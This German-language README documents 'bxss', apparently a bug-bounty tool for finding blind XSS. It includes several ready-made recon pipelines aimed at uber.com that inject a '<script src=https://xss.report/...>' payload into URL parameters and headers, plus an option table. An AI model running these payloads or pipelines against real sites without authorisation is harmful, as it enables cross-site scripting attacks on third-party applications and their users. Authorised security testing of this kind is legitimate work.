
Blind XSS Scanner ist ein Tool, das verwendet werden kann, um nach blinden XSS-Schwachstellen in Webanwendungen zu scannen.
Bxss ist ein leistungsstarker Blind-XSS-Scanner, der die Erkennung von Blind-XSS-Schwachstellen in Webanwendungen automatisiert.
Wir arbeiten aktiv an der Integration eines Chromium-basierten Worker-Pools, um die Leistung von bxss auf leistungsschwachen Geräten zu verbessern.
Mit dieser Funktion können ressourcenintensive Aufgaben wie die DOM-basierte XSS-Erkennung oder die Überprüfung von Payloads nach dem Auslösen auf leichte Chromium-Instanzen ausgelagert werden, die über einen Pool verwaltet werden. Durch die effiziente Verteilung der Arbeitslast auf mehrere Headless-Browser-Kontexte bleibt bxss auch auf schwächeren Maschinen reaktionsschnell und nutzbar.
Dadurch wird bxss nicht nur leistungsstark, sondern auch unabhängig von Systemeinschränkungen äußerst zugänglich.
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
Der Trace-Modus ist eine experimentelle Funktion, mit der Sie nachverfolgen können, wo das BlindXSS ausgelöst wurde. Einige Drittanbieter-Plattformen für BlindXSS wie https://xss.report/ ermöglichen es Ihnen, benutzerdefinierte Parameter in Ihren Payloads anzugeben. Damit können Sie verfolgen, wo das BlindXSS ausgelöst wurde. Wenn Sie beispielsweise den Parameter url=https://somehost.com in Ihrem Payload angeben, verwendet das Tool das Payload
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
zum Testen. Nach einem Auslöser können Sie das DOM inspizieren und sehen, von welchem Host das BlindXSS ausgelöst wurde.
Stellen Sie sicher, dass Sie beim Zuweisen benutzerdefinierter Parameter in Ihrem Dashboard url={LINK} zuweisen, damit bxss {LINK} automatisch durch die tatsächliche URL ersetzen kann.
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
Für fortgeschrittenes Dorking und die Erkundung von Schwachstellen besuchen Sie Dorki und melden Sie sich noch heute an!
Wenn Sie mit diesem Tool eine Prämie erhalten, denken Sie darüber nach, mich mit einem Kaffee zu unterstützen!
| Argument | Beschreibung | Standard |
|---|
-a | Hängt das Payload an den Parameter an | false |
-c int | Setzt die Parallelitätsstufe | 30 |
-H string | Setzt einen benutzerdefinierten Header | "" |
-hf string | Pfad zur Datei mit Headern | "" |
-p string | Das Blind-XSS-Payload | "" |
-pf string | Pfad zur Datei mit Payloads | "" |
-t | Testet Parameter auf Blind XSS | false |
-X string | Zu verwendende HTTP-Methode | "" |
-v | Debug-Modus aktivieren | false |
-rl float | Ratenbegrenzung (Anfragen pro Sekunde) | 0 |
-f | Weiterleitungen folgen | false |
-l | Trace-Modus aktivieren (experimentell) | false |